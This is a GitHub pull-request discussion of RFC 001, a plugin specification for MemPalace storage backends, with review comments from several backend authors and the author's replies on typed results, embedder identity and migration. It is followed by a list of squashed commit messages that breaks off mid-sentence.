docs: RFC 001 — storage backend plugin specification#743
docs: RFC 001 — storage backend plugin specification#743
Conversation
Formalizes the BaseCollection/BaseBackend contract introduced as a seam in #413 into an interchangeability spec that third-party backends can build to. Driven by six in-flight backend PRs (#574, #643, #665, #697, #700, #381) each implementing the interface differently. Key decisions captured: entry-point distribution, typed QueryResult/ GetResult replacing Chroma dict shape, daemon-first multi-palace model via PalaceRef, required where-clause subset (incl. $contains), mandatory embedder injection with model-identity validation, capability tokens, shared pytest conformance suite, and a backend-neutral migrate/verify CLI.
There was a problem hiding this comment.
Pull request overview
This PR introduces RFC 001, a draft specification for MemPalace storage backend plugins. It formalizes a stable contract so third-party backends can be distributed as mempalace-<name> Python packages and loaded into MemPalace via entry-point discovery, enabling multi-backend / multi-palace (daemon-first) deployments.
Changes:
- Adds a full draft spec defining the
BaseCollection/ backend lifecycle contract, including typedQueryResult/GetResultshapes. - Specifies backend discovery/selection (entry points + registry), configuration shape, and capability-token conventions.
- Defines required filter dialect behavior, migration/verification expectations, and a shared backend conformance test suite concept.
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
Copilot review flagged back-references in §1.4 and §6 that still used the pre-skuznetsov-rename names (`$contains_fast`, `sync_capable`, `change_feed`). Updated to the `supports_*` prefix used in the §2.1 capability table.
Incorporates review feedback from skuznetsov (Postgres, #665) and dekoza (Lance, #574) on issue #737: - §1.5: split 'accepts embeddings=' (signature compliance) from 'persists embeddings as-is' (correctness). Adds supports_embeddings_passthrough capability; the former is universal, the latter is required to label a migration lossless. - §1.5: model identity check becomes a three-state machine (known_match / known_mismatch / unknown) so legacy palaces without recorded identity don't hard-fail on upgrade. - §1.4: makes explicit that supports_contains_fast is the ONLY performance floor the spec promises; without it callers MUST assume O(n). $contains is a correctness requirement, not a performance one. - §3.3: clarifies auto-detect is an upgrade-compat path only, never the selection mechanism for new palaces. - §8.2: migrate CLI refuses to run against a target lacking supports_embeddings_passthrough unless --accept-re-embed is passed; migration record now captures lossless status and model identities.
dekoza
left a comment
There was a problem hiding this comment.
Reviewed from the LanceDB (#574) perspective. No show-stoppers — our implementation is already close to the spec's target shape. Notes below.
§1.1 — kwargs-only signatures
Our backends/lance.py already uses kwargs-only on add/upsert, and our BaseCollection ABC in backends/base.py does the same (work done in #575, easily backported). query/get/delete currently use **kwargs catch-all — those need explicit parameter lists to match the spec.
§1.1 — query_embeddings and where_document
Our query() doesn't accept query_embeddings and neither query() nor get() accepts where_document. Both are straightforward for LanceDB:
query_embeddings: skip the embed step, search the vector directlywhere_document: same$containspath (Tantivy FTS orLIKEfallback)
§1.1 — update() method
Our BaseCollection and LanceCollection already have an update() method (fetches existing records, merges changes, re-upserts). The spec's BaseCollection does not include update(), though supports_update exists as a capability token. Is update() intentionally excluded from the required interface, or an oversight? If it stays out, we'd keep it as a LanceDB-specific extension — but it seems generally useful.
§1.3 — Typed results
Our return shapes already match QueryResult/GetResult field structure. Migration is wrapping dict construction in dataclass constructors. No concern.
§1.5 — Three-state model identity
We persist embedding_model per-record in metadata_json but not at collection level. Spec wants collection-level persistence + check on open. LanceDB supports table-level metadata via Arrow schema metadata — clean fit. The unknown state for legacy palaces is the right call; hard-failing on upgrade would break existing users.
§2.3 — BaseBackend class
We already have LanceBackend in backends/lance.py with a get_collection() factory method (from #575, easily backported to #574). It currently takes palace_path: str — adapting to PalaceRef is straightforward. It does not yet subclass a BaseBackend ABC (spec §2.3), but the method shape is close.
§3.3 — Auto-detection
Our backends/__init__.py already has detect_backend() sniffing for .lance directories. Adapting to a BaseBackend.detect(path) -> bool classmethod is trivial. Agree with the spec's framing that auto-detection is a migration compatibility path, not a selection mechanism.
§6 — Sync compatibility note
Our sync implementation uses a _raw=True flag on upsert() to skip sync metadata injection during sync apply. The spec's BaseCollection.upsert() has no such parameter, which is correct — sync concerns should not leak into the collection contract. This means we need to refactor sync injection out of LanceCollection into a wrapper layer, which aligns with §6's "sync is a separate subsystem" stance. Wanted to flag this since other backends implementing sync will face the same design question.
§10 — Cleanup gating
+1 on landing the Chroma direct-import cleanup before backend PRs rebase. The seven files importing chromadb directly would break any pure-Lance deployment. This cleanup benefits all backend authors equally.
§11 — Alignment effort for #574
Assessment is accurate. We already have backends/ with BaseCollection ABC, LanceBackend, and kwargs-only signatures (work from #575, easily backported). Remaining work: explicit param lists on query/get/delete (instead of **kwargs), typed results, $contains/where_document, collection-level model identity, PalaceRef adoption, conformance test subclass, sync injection refactor, and package extraction to mempalace-lance. All small-to-medium. No architectural conflicts.
§12 — Open questions
changes_sincewith collection filter — yes, useful. Our sync tracks changes per-table; filtering by collection name is natural.- Per-palace capabilities — worth having.
supports_contains_fastdepending on whether an FTS index exists is a real case for us. run_maintenancereturn shape — structured return preferred. LanceDB compaction can report fragment count before/after and bytes reclaimed, useful for operator dashboards and benchmark reporting.
|
Reviewed the actual RFC diff. From the Postgres / Three small spec-clarity points I would consider before backend authors start rebasing:
The Goals section says
§1.5 says backends MUST NOT hardcode models and must validate model identity/dimension, but §2.1 / §5 allow
§7.3 says benchmarks should run explicit None of these change the shape of the RFC. They are mostly guardrails to keep the spec precise once implementations begin targeting it. |
There was a problem hiding this comment.
Reviewed from the perspective of a 134K-drawer production deployment on the Chroma backend, with experience evaluating LanceDB (via Karta's embedded LanceDB + SQLite architecture).
No show-stoppers. This is the right time to formalize the backend contract — the six-way divergence is already causing friction. Notes below.
§1.3 — Typed results (migration cost for existing forks/consumers)
This is a breaking change for anyone with code touching mcp_server.py or searcher.py that assumes dict returns. My fork has ~20 changes across those files — all dict-shaped. The migration path is clear (wrap in dataclass constructors, same as dekoza noted), but the blast radius is worth calling out: it's not just backend authors who need to update, it's everyone downstream who consumes query results. A compatibility shim (.to_dict() on the result types) during the transition would make the upgrade gentler for plugin authors and forks.
§1.5 — Three-state model identity is exactly right
My palace has 134K drawers with no recorded embedder identity. Hard-failing on upgrade would brick every pre-v1 palace. The unknown → warn → record-on-next-write path is the correct design. One detail: the spec says the identity is recorded "on the next successful write, reindex, or migration." For read-heavy deployments that rarely write new drawers, this means the palace could stay in unknown state indefinitely. Consider also recording on explicit mempalace verify or mempalace status (read-only operations that already touch the collection) so operators can resolve it without forcing a write.
§2.5 — Concurrency guarantee matches real usage
The spec says backends can assume single-thread access per collection, with core serializing per palace. This matches how the MCP server actually works today — good call. My fork added threading.Lock to the graph cache (#661) because build_graph() was the one place concurrent access was possible. The per-palace serialization guarantee would have made that unnecessary. Worth documenting this guarantee prominently so backend authors don't over-synchronize.
§7.3 — Benchmark methodology is the most underrated section
At 134K drawers on Chroma, I've hit the HNSW pathology firsthand — the graph's on-disk size and query latency behave very differently before and after compaction, and after external writes that invalidate the in-memory index (the exact problem my stale HNSW mtime detection fix addresses in #663). The three-phase benchmark requirement (post-bulk-load, post-background-maintenance, post-explicit-maintenance) would have caught the performance cliff I found empirically. Strong +1 on maintenance_state() being part of the published numbers.
§8 — Migration at scale
At 134K drawers, re-embedding is not a minor cost — it's hours of compute depending on the model. The lossless vs re-embed distinction and the --accept-re-embed explicit opt-in are the right design. One request: mempalace migrate should report progress (rows migrated / total, ETA) for large palaces. A 134K-drawer migration that runs silently for hours will get killed by impatient operators.
§10 — Cleanup prerequisite will affect fork contributors
My fork's mcp_server.py imports chromadb directly for the BLOB seq_id repair (#664) and mtime-based cache invalidation (#663). Both are deeply Chroma-specific. The cleanup PR routing all callers through BaseCollection is the right gating decision, but it will require Chroma-specific fixups to move behind the backend boundary. Backend-specific maintenance operations (like BLOB repair) might need a BaseBackend.repair() or similar escape hatch — otherwise they end up as out-of-band scripts that bypass the abstraction.
§12 — Open questions
- Per-palace capabilities — yes.
supports_contains_fastdepending on whether an FTS index exists is a real case. I'd add:supports_mtime_detectionor similar for backends where external-write detection is possible (Chroma via SQLite mtime) vs not (server-mode backends where the filesystem isn't local). My #663 fix is Chroma-specific precisely because mtime detection only makes sense for local file-backed stores.
Addresses the actual spec defects flagged in #743 review, ignoring operator-UX asks that are not plugin-contract concerns. - Goal #3: 'without data loss' → mirrors §8.2's capability-conditional lossless-vs-reembed framing. No more overpromise. - §1.5: `server_embedder` is no longer an implicit escape hatch from identity/dimension rules. Such backends MUST expose an effective identity via `effective_embedder_identity()` and are bound by the same three-state check. - §7.3: adds `maintenance_kinds: ClassVar[frozenset[str]]` advertisement mechanism. `run_maintenance(kind)` must raise UnsupportedMaintenanceKindError for unadvertised kinds. Benchmark harness reads this set rather than guessing kind names. Reserves `analyze`/`compact`/`reindex` as well-defined names. - §1.2: adds `update()` as optional method with a default get+merge+ upsert implementation. §2.1: `supports_update` redefined to gate atomic single-round-trip semantics (not mere capability), since the default impl already supports partial updates. Operator asks explicitly NOT adopted (diplomatic shims, not contract defects): `.to_dict()` compat on typed results, migration progress reporting, `BaseBackend.repair()` separate from `run_maintenance`, per-palace capability variance, identity recording on read-only ops.
|
Thanks @skuznetsov @dekoza @jphein — substantive reviews on all sides. Commit 922aa99 closes the four spec defects the reviews surfaced. A number of reasonable operator asks are explicitly not being adopted; explaining both below, so the boundary is clear for anyone implementing against this. Adopted — spec defects1. Goals wording (skuznetsov) — Goal 3 now mirrors §8.2 instead of overpromising "without data loss." The spec delivers lossless migration when capabilities allow, re-embedding otherwise. Both are explicit; neither is hidden. 2.
3. 4. Not adopted — operator comfort, not plugin-contract concernsThese are all reasonable asks, and I want to be explicit that they're not dismissed because they're wrong — they're not adopted because they don't belong in this spec. A well-engineered plugin contract has a small, stable surface. Layering operator-UX conveniences into the core interface makes it worse for every future backend author.
NetFour spec edits, small and targeted. The contract is tighter for it. The rejected items are good ideas for the implementations — CLI progress, fork-friendly shims, richer operator tooling — they just don't live in the plugin contract. #743 is ready for another look. |
|
Thanks, this addresses my Postgres / |
#757 landed mtime/inode cache invalidation and mempalace_reconnect in mcp_server._get_client(). Both are Chroma-specific (stat of chroma.sqlite3). They should migrate into ChromaBackend.get_collection and ChromaBackend.close_palace during the §10 cleanup so the freshness contract lives inside the backend, not in the caller.
Prerequisite for RFC 001 (plugin spec, #743). Removes every direct `import chromadb` outside the ChromaDB backend itself so the core modules depend only on the backend abstraction layer. Extends ChromaBackend with make_client, get_or_create_collection, delete_collection, create_collection, and backend_version. Adds update() to the BaseCollection contract. Non-backend callers (mcp_server, dedup, repair, migrate, cli) now go through the abstraction; tests patch ChromaBackend instead of chromadb. With this landed, the RFC 001 spec can be enforced and PalaceStore (#643) can ship as a plugin without touching core modules.
|
Quick coordination question from the PostgreSQL / pg_sorted_heap backend side: Is RFC 001 now stable enough to use as the target contract for reworking #665, or would you prefer that implementation PRs wait until #743 is merged and the §10 backend cleanup follow-up starts/lands? From my side, the expected #665 rewrite would target the RFC shape directly:
I’m asking to avoid rebasing the current conflicting branch into an intermediate shape if the intended path is now RFC-first. |
|
Read the full spec. From the multi-tenant hosted side (#697), this looks solid. Works for us
Questions1. Namespace isolation — security boundary or naming convention? For us, namespace is a tenant isolation boundary. When a user searches across personal + team vaults, the sidecar resolves which namespaces to query based on a gateway-authorized team_ids list. A team namespace that isn't in that list gets rejected. §4.4 says "the backend uses it as given" — should backends also enforce namespace isolation, or is that purely the caller's job? 2. PalaceRef.id uniqueness scope Unique globally or per backend instance? 3. Typed results (§1.3) — hard cutover? Is there a transition period, or do all callers need to migrate from Chroma dicts in one go? We have 30 MCP tool functions consuming dict shapes. 4. §7.4 NAMESPACE_MEMPALACE Worth assigning now — the placeholder blocks Qdrant PRs. 5. §10 mcp_server caching We hit a related bug (collection cache bleed between tenants). Moving caching into #697 alignmentOur |
…nd registry (RFC 001 §10) Advances RFC 001 §10 cleanup so backend-author PRs (#574 LanceDB, #665 Postgres, #700 Qdrant, #697 hosted, #643 PalaceStore, #381 Qdrant) have a stable target to align against. Scope (this PR): - Typed QueryResult / GetResult dataclasses replace Chroma's dict shape at the BaseCollection boundary (§1.3). A transitional _DictCompatMixin keeps existing callers working while the attribute-access migration proceeds. - BaseCollection is now kwargs-only across add/upsert/query/get/delete/update with ABC defaults for estimated_count/close/health and a non-atomic default update() (§1.1–1.2). - PalaceRef replaces raw path strings at the backend boundary (§2.2). - BaseBackend ABC with get_collection/close_palace/close/health/detect (§2.3). - mempalace.backends entry-point group + in-tree registry with resolve_backend_for_palace priority order matching §3.2–3.3. - ChromaCollection normalizes chroma returns into typed results; unknown where-clause operators raise UnsupportedFilterError (no silent drop, §1.4). - ChromaBackend absorbs the inode/mtime client-cache freshness check previously duplicated in mcp_server._get_client() (§10 + PR #757). - searcher.py migrated to typed-attribute access as the reference call site; remaining callers land in a follow-up. - pyproject: chroma registered via [project.entry-points."mempalace.backends"]. Out of scope (explicit follow-ups): - Full caller migration off the dict-compat shim across palace.py, mcp_server.py, miner.py, convo_miner.py, dedup.py, repair.py, exporter.py, palace_graph.py, cli.py, closet_llm.py. - Embedder injection + three-state EmbedderIdentityMismatchError check (§1.5). - maintenance_state() / run_maintenance() benchmark hooks (§7.3). - AbstractBackendContractSuite full coverage (§7.1–7.2). - mempalace migrate / mempalace verify CLI rewrites through BaseCollection (§8). Tests: 970 passed (up from 967 on develop); new coverage for typed results, empty-result outer-shape preservation, \$regex rejection, registry lookup, priority resolver, and PalaceRef-kwarg ChromaBackend.get_collection. Refs: #743 (RFC 001), #989 (RFC 002 tracking issue).
Scanned all 233 open upstream PRs today against our open PRs and fork-ahead / planned-work items. Findings merged into README: - P2 (decay) and P3 Tier-0 (LLM rerank): both covered by MemPalace#1032 (@zackchiutw, MERGEABLE, 2026-04-19 — Weibull decay + 4-stage rerank pipeline). Older simpler version at MemPalace#337. Dropped as fork work; watching MemPalace#1032. - P7 (alternative storage): formally out of scope. RFC 001 MemPalace#743 (@igorls) defines the plugin contract; four backend PRs already in flight (MemPalace#700, MemPalace#381 Qdrant; MemPalace#574, MemPalace#575 LanceDB). Fork consumes, does not rebuild. - P0 (multi-label tags): still fork/upstream candidate. MemPalace#1033 (@zackchiutw) ships adjacent privacy-tag + progressive disclosure but not the full multi-label scheme. - Merged MemPalace#1023 section acknowledges complementary MemPalace#976 (felipetruman) which adds broader mine_global_lock() + HNSW num_threads pin. Gives future-us a map so we don't re-file MemPalace#1036-style duplicates.
bensig
left a comment
There was a problem hiding this comment.
Reviewed in full. This is the right shape and depth for a 1.0 spec — closes the open decisions deliberately deferred by #413, calls out the in-flight PR impact concretely, names the cleanup work it depends on, and stays out of scope where deferral is honest (sync, wire protocol, embedder).
Approving on merit. One mechanical block + a few suggestions worth folding in before this lands.
Block
- §7.4 `NAMESPACE_MEMPALACE = uuid.UUID("TO-BE-ASSIGNED-ONCE-FOR-ALL-TIME")` — placeholder. Needs an actual UUID assigned and recorded in the spec text before this merges, since the section explicitly says "fixed at spec v1 adoption." Suggest `python -c "import uuid; print(uuid.uuid4())"` and pin it.
Suggestions (small, fold-in-able)
-
§5 references "a separate RFC" for the embedder contract. Worth either filing the tracking issue and linking it from this section, or marking the dependency as a parallel work item in §13. Right now the spec hard-depends on an external contract that has no anchor.
-
§4.2 env var splitting rule for hyphenated/underscored backend names. The example uses backend name "pg_prod" in §4.1 but `MEMPALACE_POSTGRES_DSN` in §4.2. If users name a backend "pg_prod", does the env shape become `MEMPALACE_PG_PROD_`? `MEMPALACE_PG-PROD_`? Or is `MEMPALACE__` keyed by backend type not instance? One sentence would close it.
-
§3.3 priority + global env interaction. A user with `MEMPALACE_BACKEND=postgres` set globally who opens a palace with on-disk Chroma artifacts gets postgres (env wins, auto-detect skipped). That's correct behavior, but worth one sentence calling it out — "setting MEMPALACE_BACKEND globally overrides existing-palace auto-detection; users opening pre-existing palaces should leave it unset." Saves a real support incident.
-
§9 major-version mismatch error. "Refuses to load a backend declaring a different major version." Worth a one-line example of the error message shape so backend authors know what their users will see when they install an incompatible version. Drop a `BackendVersionMismatchError(...)` example next to the rule.
-
§7.4 reserved maintenance kinds. `"analyze"` / `"compact"` / `"reindex"` are reserved with required semantics. Consider naming the non-required implementation pattern: e.g., "a backend that has no analogue for a kind MUST omit it from `maintenance_kinds` rather than declaring it as a no-op." Otherwise nothing prevents a benchmark harness from seeing `"analyze"` in `maintenance_kinds` and assuming it does what the spec says when the implementation is empty.
Strengths
- Capability-token design is sharp. The signature-compliance vs semantic-guarantee split (`supports_embeddings_in` vs `supports_embeddings_passthrough`) is exactly the right granularity. Same for the `server_embedder` carve-out in §1.5 — `server_embedder` documents where embedding happens, never suspends the dimension/identity safety contract. Beautifully written paragraph; reads like it survived a real ambiguity.
- Three-state embedder identity check (`known_match` / `known_mismatch` / `unknown`) is the kind of detail that prevents a real upgrade incident. Hard-failing legacy palaces from #413 would be hostile; this gives them a clean transition path with a warning.
- §10 cleanup prerequisite is honest. Names the 7 files still importing `chromadb` directly with line numbers, calls out `mcp_server._get_client()` as a Chroma-specific cache that needs to migrate into `ChromaBackend.get_collection()` per §2.5. Most RFCs hand-wave this section; this one names the actual work.
- Migration honesty (§8.2). Lossless vs re-embed is explicit; `--accept-re-embed` is required, written to the migration log, never silent. The pairing requirement (`supports_migration_export` source-side + `supports_embeddings_passthrough` target-side) prevents a class of subtle silent-degrade bugs.
- Benchmark methodology in §7.3 is rare to see in an RFC and prevents the un-`ANALYZE`'d-Postgres-vs-settled-Chroma anti-pattern. Reserved kind names + three-phase publishing requirement + harness MUST NOT assume kind names — that's the level of rigor this saves you from re-litigating later.
- §3.3 auto-detection scoped tightly. "Strictly a migration/upgrade compatibility path, not a general selection mechanism." Explicit configuration always wins. Right call.
- §11 in-flight PR impact table is concrete. Shows this spec was written with the actual outstanding work in mind, not in a vacuum. Each PR has a one-line align-effort estimate.
- §13 rollout sequence is realistic — cleanup first, spec second, Chroma updated third, in-flight rebased fourth, migration CLI fifth. Matches what's actually achievable.
Observation, not actionable
- RFC 002 (source adapter plugin spec) shipped in v3.3.2 ahead of RFC 001. The numbering doesn't imply ordering, but it's worth noting Igor is comfortable shipping concrete implementation ahead of formal RFC merge. The §10 cleanup discipline + §11 PR impact table here suggest that's a deliberate pattern, not drift. Approving on the strength of that.
Once the UUID gets assigned and the four small clarifications are folded in, this is ready to merge as the contract that the v4.0-alpha backend work targets. Status can move from Draft to Accepted with a date.
* feat: add Hindi language support to i18n module * Create SECURITY.md This PR introduces a standard SECURITY.md policy file to the repository. While reviewing the codebase, I noticed there wasn't a defined channel for the private, responsible disclosure of security vulnerabilities. Adding this policy helps protect the project by guiding researchers to report bugs privately rather than in public issues. I highly recommend merging this and enabling GitHub's "Private Vulnerability Reporting" feature in your repository settings. I currently have some security findings I would like to share with the maintainers securely once a private channel or contact method is established. * fix: save hook auto-mines transcript without MEMPAL_DIR (#840) TDD: test written first, failed, then fixed. Problem: save hook says "saved in background" but MEMPAL_DIR defaults to empty, so nothing actually mines. Users get no auto-save despite the hook firing every 15 messages. Fix: use TRANSCRIPT_PATH (received from Claude Code in the hook's JSON input) to discover the session directory. Mine that directory automatically. MEMPAL_DIR is still supported as override but no longer required. Also fixed: bare python3 → $(command -v python3) for nohup safety. Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * release: v3.3.0 (#839) * fix: add file-level locking to prevent multi-agent duplicate drawers Root cause: when multiple agents mine simultaneously, both pass file_already_mined() check, both delete+insert the same file's drawers, creating duplicates or losing data. Fix: mine_lock() in palace.py — cross-platform file lock (fcntl on Unix, msvcrt on Windows). Both miner.py and convo_miner.py now lock per-file during the delete+insert cycle and re-check after acquiring the lock. Tested: - Lock acquires and releases correctly - Second agent blocks until first releases (0.25s wait) - 33/33 existing tests pass - Cross-platform: fcntl (macOS/Linux), msvcrt (Windows) Based on v3.2.0 tag. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: strip system tags, hook output, and Claude UI chrome from drawers normalize.py now strips before filing: - <system-reminder>, <command-message>, <command-name> tags - <task-notification>, <user-prompt-submit-hook>, <hook_output> tags - Hook status messages (CURRENT TIME, Checking verified facts, etc.) - Claude Code UI chrome (ctrl+o to expand, progress bars, etc.) - Collapsed runs of blank lines This noise was going straight into drawers, wasting storage space and polluting search results. strip_noise() runs on all normalized output regardless of input format (JSONL, JSON, plain text). 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * feat: add closet layer — searchable index pointing to drawers The closet architecture was always part of MemPalace's design but never shipped in the public codebase. This adds it. Palace now has TWO collections: - mempalace_drawers — full verbatim content (unchanged) - mempalace_closets — compact AAAK-style index entries How it works: - When mining, each file gets a closet alongside its drawers - Closet contains extracted topics, entities, quotes as pointers - Closets pack up to 1500 chars, topics never split mid-entry - Search hits closets first (fast, small), then hydrates the full drawer content for matching files - Falls back to direct drawer search if no closets exist yet Files changed: - palace.py: get_closets_collection(), build_closet_text(), upsert_closet(), CLOSET_CHAR_LIMIT - miner.py: process_file() now creates closets after drawers - searcher.py: search_memories() tries closet-first search, hydrates drawers, falls back to direct search Backwards compatible — existing palaces without closets continue to work via the fallback path. Closets are created on next mine. 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: enforce atomic topics in closets, extract richer pointers - upsert_closet replaced by upsert_closet_lines: checks each topic line individually against CLOSET_CHAR_LIMIT. If adding one line WHOLE would exceed the limit, starts a new closet. Never splits mid-topic. - build_closet_lines returns a list of atomic lines (not joined text) - Richer extraction: section headers, more action verbs, up to 3 quotes, up to 12 topics per file - Each line is complete: topic|entities|→drawer_refs Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * docs: add CLOSETS.md — closet layer overview Cherry-picked the docs portion of 67e4ac6 to accompany the closet feature. Test coverage for closets is omnibus with tests for entity metadata and BM25 (see PR targeting those features) and will land together in a follow-up. Co-Authored-By: MSL <[email protected]> * feat: entity metadata + diary ingest + BM25 hybrid search Three features that close the gap between the architecture docs and the actual codebase: 1. Entity metadata on drawers and closets - _extract_entities_for_metadata() pulls names from known_entities.json + proper nouns appearing 2+ times - Stamped as "entities" field in ChromaDB metadata - Enables filterable search by person/project name 2. Day-based diary ingest (diary_ingest.py) - ONE drawer per day, upserted as the day grows - Closets pack topics atomically, never split mid-topic - Tracks entry count in state file, only processes new entries - Usage: python -m mempalace.diary_ingest --dir ~/summaries 3. BM25 hybrid search in searcher.py - _bm25_score() keyword matching complements vector similarity - _hybrid_rank() combines both signals (60% vector, 40% BM25) - Catches exact name/term matches that embeddings miss - Applied to both closet-first and direct drawer search paths 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * test: add tests for mine_lock, closets, entity metadata, BM25, diary Trimmed version of Milla's omnibus test_closets.py to only cover features present in this PR stack (#784 lock, #788 closets, this PR's entity/BM25/diary). Strip-noise tests will land with #785; tunnel tests will land with the tunnels PR. 16/16 pass. Co-Authored-By: MSL <[email protected]> * feat: explicit cross-wing tunnels for multi-project agents Adds active tunnel creation alongside passive tunnel discovery. Passive tunnels (existing): rooms with the same name across wings. Explicit tunnels (new): agent-created links between specific locations. "This API design in project_api relates to the database schema in project_database." New functions in palace_graph.py: - create_tunnel() — link two wing/room pairs with a label - list_tunnels() — list all explicit tunnels, filter by wing - delete_tunnel() — remove a tunnel by ID - follow_tunnels() — from a room, find all connected rooms in other wings with drawer content previews New MCP tools: - mempalace_create_tunnel - mempalace_list_tunnels - mempalace_delete_tunnel - mempalace_follow_tunnels Tunnels stored in ~/.mempalace/tunnels.json (persists across palace rebuilds). Deduplicated by endpoint pair. 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * test: add TestTunnels for cross-wing tunnel operations Appended from Milla's omnibus test_closets.py — covers create, list, delete, dedup, and follow_tunnels behavior. 21/21 pass. Co-Authored-By: MSL <[email protected]> * feat(search): drawer-grep returns best-matching chunk + neighbors When a closet hit leads to a source file with many drawers, grep each chunk for query terms and return the BEST-MATCHING chunk + 1 neighbor on each side, instead of dumping the whole file truncated at MAX_HYDRATION_CHARS. Result now includes drawer_index and total_drawers so callers can request adjacent drawers explicitly. Extracted from Milla's commit 935f657 which bundled drawer-grep with closet_llm (deferred pending LLM_ENDPOINT refactor) and fact_checker (separate PR). Ported only the searcher.py change. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * feat: offline fact checker against entity registry + knowledge graph fact_checker.py verifies text for contradictions against locally stored entities and KG facts. Catches similar-name confusion (Bob vs Bobby), relationship mismatches (KG says husband, text says brother), and stale facts (KG valid_from/valid_to). No hardcoded facts. No network calls. Reads: - ~/.mempalace/known_entities.json - KnowledgeGraph SQLite Usage: from mempalace.fact_checker import check_text issues = check_text("Bob is Alice's brother", palace_path) # CLI python -m mempalace.fact_checker "text" --palace ~/.mempalace/palace Extracted from Milla's commit 935f657 which bundled this with closet_llm (deferred) and drawer-grep (PR #791). Ported only fact_checker.py — verified no network / API imports. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * feat: optional LLM-based closet regeneration — bring-your-own endpoint Adds mempalace/closet_llm.py as an OPTIONAL path for richer closet generation. Regex closets remain the default and cover the local-first promise; users who want LLM-quality topics can bring their own endpoint. Configuration (env or CLI flag): LLM_ENDPOINT — OpenAI-compatible base URL (required) LLM_KEY — bearer token (optional; local inference skips this) LLM_MODEL — model name (required) Works with Ollama, vLLM, llama.cpp servers, OpenAI, OpenRouter, and any other provider that speaks OpenAI-compatible /chat/completions. Zero new dependencies — uses stdlib urllib. Replaces the original Anthropic-SDK-hardcoded version of this module from Milla's branch (commit 935f657). Same prompt, same parsing, same regenerate_closets flow; only the transport was generalised so the feature doesn't lock users into a specific vendor or require API keys for core memory operations (CLAUDE.md, "Local-first, zero API"). Includes 13 unit tests covering config resolution, request shape, auth-header omission when no key is set, code-fence stripping, and missing-config error path. All mocked — zero network calls in tests. Co-Authored-By: MSL <[email protected]> * fix(search): hybrid closet+drawer retrieval — closets boost, never gate (#795) * Fix: set cosine distance metadata on all collection creation sites ChromaDB defaults HNSW index to L2 (Euclidean) distance, but MemPalace scoring uses 1-distance which requires cosine (range 0-2). Add metadata={"hnsw:space": "cosine"} to the 4 production and 3 test call sites that were missing it. Closes #218 * fix: sync version.py to 3.2.0 Commit 6614b9b bumped pyproject.toml to 3.2.0 but missed mempalace/version.py, breaking test_version_consistency on every PR's CI. This syncs them. * refactor: extract locked filing block to keep mine_convos under C901 Adding the per-file lock + double-checked file_already_mined() in the previous commit pushed mine_convos cyclomatic complexity from 25 to 26, just over ruff's max-complexity threshold. Hoist the locked critical section into _file_chunks_locked() so the outer loop stays within budget. No behavior change. * style: ruff format mempalace/palace.py Add blank lines after inline imports in mine_lock. Pure formatting. * fix(normalize): make strip_noise verbatim-safe and scope it to Claude Code JSONL The initial strip_noise() regressed on three fronts when audited against adversarial user content — each verified with executable repros against the cherry-picked code: 1. `<tag>.*?</tag>` with re.DOTALL span-ate across messages: one stray unclosed <system-reminder> anywhere in a session merged with the next closing tag, silently deleting everything between them (including full assistant replies). 2. `.*\(ctrl\+o to expand\).*\n?` nuked entire lines of user prose whenever a user happened to document the TUI shortcut. 3. `Ran \d+ (?:stop|pre|post)\s*hook.*` with IGNORECASE ate the second sentence from "our CI has a stop hook ... Ran 2 stop hooks last week" — legitimate user commentary. These are unambiguous violations of the project's "Verbatim always" design principle. Fixes: - All tag patterns are now line-anchored (`(?m)^(?:> )?<tag>`) and their body forbids crossing a blank line (`(?:(?!\n\s*\n)[\s\S])*?`), so a dangling open tag cannot eat neighboring messages. - `_NOISE_LINE_PREFIXES` are line-anchored and case-sensitive — user prose mentioning "CURRENT TIME:" mid-sentence is preserved. - Hook-run chrome requires `(?m)^`, explicit hook names (Stop, PreCompact, PreToolUse, etc.), and no IGNORECASE. - "… +N lines" is line-anchored. - "(ctrl+o to expand)" only matches Claude Code's actual collapsed- output chrome shape `[N tokens] (ctrl+o to expand)`; a bare parenthetical in user prose stays intact. Scope: - `strip_noise()` is no longer called on every normalization path. Only `_try_claude_code_jsonl` invokes it, per-extracted-message — so Claude.ai exports, ChatGPT exports, Slack JSON, Codex JSONL, and plain text with `>` markers pass through fully verbatim. Per-message application also makes span-eating structurally impossible. Tests: - 15 new tests in test_normalize.py pin the boundary: 6 guard user content that must survive (each of the adversarial repros), 9 assert real system chrome is still stripped. All pass; full suite 702 pass (2 failures are the unrelated pre-existing version.py bug, cleared by #820). Known limitation (not fixed here): convo_miner.py does not delete drawers on re-mine, so transcripts mined before this PR keep noise- filled drawers until the user manually erases + re-mines. Proper fix needs a schema-version field on drawer metadata + re-mine trigger — out of scope for this PR. * feat(normalize): auto-rebuild stale drawers via NORMALIZE_VERSION schema gate Without this, the strip_noise improvement only helps new mines. Every user who had already mined Claude Code JSONL sessions would keep their noise-polluted drawers forever, because convo_miner's file_already_mined skip short-circuits before re-processing. Adds a versioned schema gate so upgrades propagate silently: - palace.NORMALIZE_VERSION=2 — bumped when the normalization pipeline changes shape (this PR's strip_noise is the v1→v2 bump). - file_already_mined now returns False if the stored normalize_version is missing or less than current, triggering a rebuild on next mine. - Both miners stamp drawers with the current normalize_version. - convo_miner now purges stale drawers before inserting fresh chunks (mirrors miner.py's existing delete+insert), extracted into _file_convo_chunks helper to keep mine_convos under ruff's C901 limit. User experience: upgrade mempalace, run `mempalace mine` as usual, old noisy drawers get silently replaced with clean ones. No erase needed, no "you need to rebuild" changelog footgun. Tests: - test_file_already_mined_returns_false_for_stale_normalize_version — pins the version gate contract for missing/v1/current. - test_add_drawer_stamps_normalize_version — fresh project-miner drawers carry the field. - test_mine_convos_rebuilds_stale_drawers_after_schema_bump — end-to-end proof that a pre-v2 palace gets silently cleaned on next mine, with orphan drawers purged and NOT skipped. Existing test_file_already_mined_check_mtime updated to include the new field; all other tests unaffected. * fix: stop hooks from making agents write in chat — save tokens The save hook and precompact hook were telling the agent to write diary entries, add drawers, and add KG triples IN THE CHAT WINDOW. Every line written stays in conversation history and retransmits 